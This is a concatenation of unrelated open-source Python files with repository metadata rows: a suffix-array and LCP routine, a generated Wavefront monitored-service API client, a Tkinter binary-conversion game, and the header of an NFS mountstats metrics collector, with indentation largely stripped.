s0 = array('i', [sa_12[i] * 3 for i in xrange(n02) if sa_12[i] < n0])
radix_pass(s0, sa_0, to_sort, n0, alphabet_size)
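    # Merge the two sorted groups into the final suffix array. Note that
    # alphabet_size is reused below as the output index counter.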
p = j = alphabet_size = 0
t = n0 - n1
while alphabet_size < n:
if sa_12[t] < n0:
i = sa_12[t] * 3 + 1
else:
i = (sa_12[t] - n0) * 3 + 2
j = sa_0[p] if p < n0 else 0
if sa_12[t] < n0:
if to_sort[i] == to_sort[j]:
test = s12[sa_12[t] + n0] <= s12[j / 3]
else:
test = to_sort[i] < to_sort[j]
elif to_sort[i] == to_sort[j]:
if to_sort[i + 1] == to_sort[j + 1]:
test = s12[sa_12[t] - n0 + 1] <= s12[j / 3 + n0]
else:
test = to_sort[i + 1] < to_sort[j + 1]
else:
test = to_sort[i] < to_sort[j]
if test:
result[alphabet_size] = i
t += 1
if t == n02:
alphabet_size += 1
while p < n0:
result[alphabet_size] = sa_0[p]
p += 1
alphabet_size += 1
else:
result[alphabet_size] = j
p += 1
if p == n0:
alphabet_size += 1
while t < n02:
if sa_12[t] < n0:
result[alphabet_size] = (sa_12[t] * 3) + 1
else:
result[alphabet_size] = ((sa_12[t] - n0) * 3) + 2
t += 1
alphabet_size += 1
alphabet_size += 1
def longest_common_prefixes(s, suffix_array):
"""
return LCP array that LCP[i] is the longest common prefix
between s[SA[i]] and s[SA[i+1]]
"""
n = len(s)
rank = array('i', [0] * n)
lcp = array('i', [0] * n)
for i in xrange(n):
rank[suffix_array[i]] = i
l = 0
for j in xrange(n):
l = max(0, l - 1)
i = rank[j]
j2 = suffix_array[i - 1]
if i:
while l + j < n and l + j2 < n and s[j + l] == s[j2 + l]:
l += 1
lcp[i - 1] = l
else:
l = 0
return lcp
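# A minimal usage sketch (assumes a plain string input): build the suffix
# array of a short word and derive its LCP array.
if __name__ == '__main__':
    word = "banana"
    sa = simple_kark_sort(word)
    lcp = longest_common_prefixes(word, sa)
    for i in xrange(len(word)):
        print("%2d %2d %s" % (sa[i], lcp[i], word[sa[i]:]))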
| mit | -6,020,669,317,332,890,000 | 28.150685 | 97 | 0.426692 | false |
wavefrontHQ/python-client | wavefront_api_client/api/monitored_service_api.py | 1 | 22234 | # coding: utf-8
"""
Wavefront REST API
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from wavefront_api_client.api_client import ApiClient
class MonitoredServiceApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def batch_update(self, **kwargs): # noqa: E501
"""Update multiple applications and services in a batch. Batch size is limited to 100. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.batch_update(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[MonitoredServiceDTO] body: Example Body: <pre>[{ \"application\": \"beachshirts\", \"service\": \"shopping\", \"satisfiedLatencyMillis\": \"100000\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" },{ \"application\": \"beachshirts\", \"service\": \"delivery\", \"satisfiedLatencyMillis\": \"100\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" }]</pre>
:return: ResponseContainer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.batch_update_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.batch_update_with_http_info(**kwargs) # noqa: E501
return data
def batch_update_with_http_info(self, **kwargs): # noqa: E501
"""Update multiple applications and services in a batch. Batch size is limited to 100. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.batch_update_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[MonitoredServiceDTO] body: Example Body: <pre>[{ \"application\": \"beachshirts\", \"service\": \"shopping\", \"satisfiedLatencyMillis\": \"100000\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" },{ \"application\": \"beachshirts\", \"service\": \"delivery\", \"satisfiedLatencyMillis\": \"100\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" }]</pre>
:return: ResponseContainer
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method batch_update" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice/services', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainer', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_services(self, **kwargs): # noqa: E501
"""Get all monitored services # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_services(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_services_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_services_with_http_info(**kwargs) # noqa: E501
return data
def get_all_services_with_http_info(self, **kwargs): # noqa: E501
"""Get all monitored services # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_services_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_services" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerPagedMonitoredServiceDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_service(self, application, service, **kwargs): # noqa: E501
"""Get a specific application # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_service(application, service, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param str service: (required)
:return: ResponseContainerMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_service_with_http_info(application, service, **kwargs) # noqa: E501
else:
(data) = self.get_service_with_http_info(application, service, **kwargs) # noqa: E501
return data
def get_service_with_http_info(self, application, service, **kwargs): # noqa: E501
"""Get a specific application # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_service_with_http_info(application, service, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param str service: (required)
:return: ResponseContainerMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application', 'service'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_service" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application' is set
if ('application' not in params or
params['application'] is None):
raise ValueError("Missing the required parameter `application` when calling `get_service`") # noqa: E501
# verify the required parameter 'service' is set
if ('service' not in params or
params['service'] is None):
raise ValueError("Missing the required parameter `service` when calling `get_service`") # noqa: E501
collection_formats = {}
path_params = {}
if 'application' in params:
path_params['application'] = params['application'] # noqa: E501
if 'service' in params:
path_params['service'] = params['service'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice/{application}/{service}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerMonitoredServiceDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_services_of_application(self, application, **kwargs): # noqa: E501
"""Get a specific application # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_services_of_application(application, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param int offset:
:param int limit:
:return: ResponseContainerPagedMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_services_of_application_with_http_info(application, **kwargs) # noqa: E501
else:
(data) = self.get_services_of_application_with_http_info(application, **kwargs) # noqa: E501
return data
def get_services_of_application_with_http_info(self, application, **kwargs): # noqa: E501
"""Get a specific application # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_services_of_application_with_http_info(application, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param int offset:
:param int limit:
:return: ResponseContainerPagedMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application', 'offset', 'limit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_services_of_application" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application' is set
if ('application' not in params or
params['application'] is None):
raise ValueError("Missing the required parameter `application` when calling `get_services_of_application`") # noqa: E501
collection_formats = {}
path_params = {}
if 'application' in params:
path_params['application'] = params['application'] # noqa: E501
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice/{application}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerPagedMonitoredServiceDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_service(self, application, service, **kwargs): # noqa: E501
"""Update a specific service # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_service(application, service, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param str service: (required)
:param MonitoredServiceDTO body: Example Body: <pre>{ \"application\": \"beachshirts\", \"service\": \"shopping\", \"satisfiedLatencyMillis\": \"100000\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" }</pre>
:return: ResponseContainerMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_service_with_http_info(application, service, **kwargs) # noqa: E501
else:
(data) = self.update_service_with_http_info(application, service, **kwargs) # noqa: E501
return data
def update_service_with_http_info(self, application, service, **kwargs): # noqa: E501
"""Update a specific service # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_service_with_http_info(application, service, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param str service: (required)
:param MonitoredServiceDTO body: Example Body: <pre>{ \"application\": \"beachshirts\", \"service\": \"shopping\", \"satisfiedLatencyMillis\": \"100000\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" }</pre>
:return: ResponseContainerMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application', 'service', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_service" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application' is set
if ('application' not in params or
params['application'] is None):
raise ValueError("Missing the required parameter `application` when calling `update_service`") # noqa: E501
# verify the required parameter 'service' is set
if ('service' not in params or
params['service'] is None):
raise ValueError("Missing the required parameter `service` when calling `update_service`") # noqa: E501
collection_formats = {}
path_params = {}
if 'application' in params:
path_params['application'] = params['application'] # noqa: E501
if 'service' in params:
path_params['service'] = params['service'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice/{application}/{service}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerMonitoredServiceDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| apache-2.0 | 2,556,072,987,155,370,000 | 40.097967 | 443 | 0.588153 | false |
RichieStacker/bingame | bingame_forms.py | 1 | 9548 | # Number-to-binary game
# Copyright (C) 2013 Jonathan Humphreys
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import random, Tkinter
from bingame_maths import get_remainder, half_number
from bingame_grading import grade
# Class to store data relevant to this form.
# error_count will need to be accessible from outside this form, though.
class GameMain():
def __init__(self, forms, apps):
self.forms = forms # Need to carry the whole dictionary across every damn class.
self.apps = apps
self.parent = self.forms["root"] # root is the parent of all widgets created in this class.
self.number = random.randint(1, 2048) # Randomly generated, between 1 and 2048. The player must gradually find the binary value of this number.
self.progress = self.number # The current number that must be divided by 2 to continue. Initially the same as "number".
self.answer = 0 # The player's answer.
self.remainder = 0 # The remainder from their answer. Can only ever be 1 or 0.
		self.answer_chain = [] # Stores the canvas text items for each answer and its remainder, building up the visible answer chain.
self.error_count = 0 # Counts the number of errors a player makes in the process of a conversion.
self.init_ui()
	# Configures the window to the appropriate parameters.
def init_ui(self):
self.parent.title("Convert to Binary") # Sets the window title.
self.parent.geometry("200x300+400+150") # Sets the window size (200x300), as well as its position (numbers preceded by plus signs).
# Canvas upon which to output the answer chain.
self.canAnswers = Tkinter.Canvas(self.parent, bg = "#EEEEEE")
self.canAnswers.place(bordermode = "outside", x = 5, y = 5, width = 190, height = 190)
		# Label to visually identify the error counter.
self.lblErrorsTag = Tkinter.Label(self.parent, anchor = "w", text = "Errors:")
self.lblErrorsTag.place(bordermode = "outside", x = 5, y = 200, width = 145, height = 25)
# The error counter itself. It's a label, so requires a StringVar to be assigned to the widget's 'textvariable' property.
# It's awkward like that.
self.error_value = Tkinter.StringVar()
self.error_value.set(str(self.error_count))
self.lblErrors = Tkinter.Label(self.parent, anchor = "w", textvariable = self.error_value)
self.lblErrors.place(bordermode = "outside", x = 155, y = 200, width = 40, height = 25)
# Label to hold the last correct answer. Saves some confusion by having it right next to the answer entry boxes.
self.last_answer_value = Tkinter.StringVar()
self.last_answer_value.set(str(self.progress))
self.lblLastAnswer = Tkinter.Label(self.parent, anchor = "w", textvariable = self.last_answer_value)
self.lblLastAnswer.place(bordermode = "outside", x = 5, y = 230, width = 60, height = 25)
		# Entry box to accept the answer rounded down to the nearest whole number.
self.entAnswer = Tkinter.Entry(self.parent, justify = "center")
self.entAnswer.place(bordermode = "outside", x = 70, y = 230, width = 105, height = 25)
# Entry box to accept the remainder left after working out the answer.
self.entRemainder = Tkinter.Entry(self.parent, justify = "center")
self.entRemainder.place(bordermode = "outside", x = 175, y = 230, width = 20, height = 25)
# A big ol' button to submit the player's answer.
self.btnSubmit = Tkinter.Button(self.parent, text = "Submit", command = self.submit_answer)
self.btnSubmit.place(bordermode = "outside", x = 5, y = 260, width = 190, height = 35)
def submit_answer(self):
		# Try to extract the answer and remainder from the entry boxes. If either cannot be converted to an integer,
		# increase the error counter by 1.
try:
self.answer = int(self.entAnswer.get())
self.remainder = int(self.entRemainder.get())
# If both values are correct, add it to the answer chain.
# Otherwise, an error for you, player.
if self.answer == half_number(self.progress) and self.remainder == get_remainder(self.progress):
self.remainder = get_remainder(self.progress)
self.progress = half_number(self.progress)
self.answer_chain.append(self.canAnswers.create_text(0,12 * len(self.answer_chain), anchor = "nw", text = str(self.progress) + " r" + str(self.remainder)))
else:
self.error_count += 1
except ValueError:
self.error_count += 1
		# Update the error counter and the current value to be divided. Also clear the entry boxes.
self.error_value.set(str(self.error_count))
self.last_answer_value.set(str(self.progress))
self.entAnswer.delete(0, "end")
self.entRemainder.delete(0, "end")
# If the player has reached 0, it's time to bring forth the binary entry form.
if self.progress == 0:
binary_entry(self.forms, self.apps)
class EnterBinary():
def __init__ (self, forms, apps):
self.forms = forms
self.apps = apps
self.parent = forms["binary"] # binary being the parent form for every widget here.
self.apps["game"] = apps["game"]
self.final_binary = bin(apps["game"].number) # The final binary value representing the number.
self.binary_answer = "" # The player's attempt at entering the binary value.
self.init_ui()
def init_ui(self):
self.parent.title("Enter binary")
self.parent.geometry("300x35+400+150")
# The entry box for the player's binary answer. The player needs to look back on their answers and enter all
# of the remainders from the last one up to the first.
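		# For example, 13 halves to 6 r1, then 3 r0, 1 r1 and 0 r1; reading the
		# remainders from last to first gives 1101, which is 13 in binary.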
self.entBinary = Tkinter.Entry(self.parent, justify = "center")
self.entBinary.place(bordermode = "outside", x = 5, y = 5, width = 195, height = 25)
# Button that does what it says on the tin: submits the answer.
self.btnSubmit = Tkinter.Button(self.parent, text = "Submit", command = self.submit_answer)
self.btnSubmit.place(bordermode = "outside", x = 205, y = 5, width = 90, height = 25)
def submit_answer(self):
# Take the player's answer from the entry box and precede it with "0b" so that it can be easily compared
# with the correct answer.
self.binary_answer = "0b" + self.entBinary.get()
# If the answer's correct, call the scorecard window.
# Otherwise, increase the error counter by 1 and update the main window accordingly.
if self.binary_answer == self.final_binary:
scorecard(self.forms,self.apps)
else:
self.apps["game"].error_count += 1
self.apps["game"].error_value.set(str(self.apps["game"].error_count))
class FinalScore():
def __init__ (self, forms, apps):
self.forms = forms
self.apps = apps
self.parent = forms["scorecard"] # scorecard is the parent for all widgets in this class.
self.error_count = apps["game"].error_count # Pass the error counter to one local to this window.
self.grade = grade(self.error_count) # Obtain a grade based on the number of errors made by the player.
# Get rid of the root and binary forms. They are no longer needed.
forms["root"].destroy()
del(apps["game"])
forms["binary"].destroy()
del(apps["binary"])
self.init_ui()
def init_ui(self):
self.parent.title("Scorecard")
self.parent.geometry("300x100+400+150")
# Label to show the player's error count, and the grade determined from that number.
self.lblScore = Tkinter.Label(self.parent, anchor = "center", text = "Errors made:\n" + str(self.error_count) + "\nYour grade:\n" + self.grade)
self.lblScore.place(bordermode = "outside", x = 5, y = 5, width = 290, height = 60)
# Button to play again.
self.btnPlayAgain = Tkinter.Button(self.parent, text = "Play again", command = self.play_again)
self.btnPlayAgain.place(bordermode = "outside", x = 5, y = 70, width = 140, height = 25)
# Button to quit.
self.btnQuit = Tkinter.Button(self.parent, text = "Exit", command = self.quit_game)
self.btnQuit.place(bordermode = "outside", x = 155, y = 70, width = 140, height = 25)
# Destroys the window and deletes this object, effectively ending the program.
def quit_game(self):
self.parent.destroy()
del(self)
# Destroys this window and spawns a new game window.
def play_again(self):
self.parent.destroy()
main()
del(self)
def main():
# Create dictionaries to store all the forms and widget classes. It's easier to pass a whole dict than it is to pass each individual form.
# Cleaner too.
forms = {}
apps = {}
forms["root"] = Tkinter.Tk() # Create a new window and assign it to the entry 'root' in the dict.
apps["game"] = GameMain(forms, apps) # Create an object based on the GameMain class, which will create all the needed widgets and variables.
forms["root"].mainloop() # Commence the event-loop.
def binary_entry(forms, apps):
forms["binary"] = Tkinter.Tk()
apps["binary"] = EnterBinary(forms, apps)
forms["binary"].mainloop()
def scorecard(forms, apps):
forms["scorecard"] = Tkinter.Tk()
apps["scorecard"] = FinalScore(forms, apps)
forms["scorecard"].mainloop()
| gpl-2.0 | -3,188,199,944,839,545,000 | 45.57561 | 159 | 0.700566 | false |
ApptuitAI/xcollector | collectors/0/mountstats.py | 1 | 11150 | #!/usr/bin/env python
# This file is part of tcollector.
# Copyright (C) 2013 The tcollector Authors.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty
# of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser
# General Public License for more details. You should have received a copy
# of the GNU Lesser General Public License along with this program. If not,
# see <http://www.gnu.org/licenses/>.
#
"""mountstats.py Tcollector
#
# This script pulls NFS mountstats data, dedupes it by mount point and puts it into the following namespaces:
#
# proc.mountstats.<rpccall>.<metric> nfshost=<nfsserver> nfsvol=<nfsvolume>
# # Note that if subdirectories of nfsvol are mounted, but the 'events' line of /proc/self/mountstats is
# identical, then the metrics will be deduped, and the first alphabetic volume name will be used
# proc.mountstats.bytes.<metric> 1464196613 41494104 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# # Taken from the 'bytes:' line in /proc/self/mountstats
# # each <metric> represents one field on the line
#
# See https://utcc.utoronto.ca/~cks/space/blog/linux/NFSMountstatsIndex
# and https://utcc.utoronto.ca/~cks/space/blog/linux/NFSMountstatsNFSOps
# for a great example of the data available in /proc/self/mountstats
#
# Example output:
# proc.mountstats.getattr.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
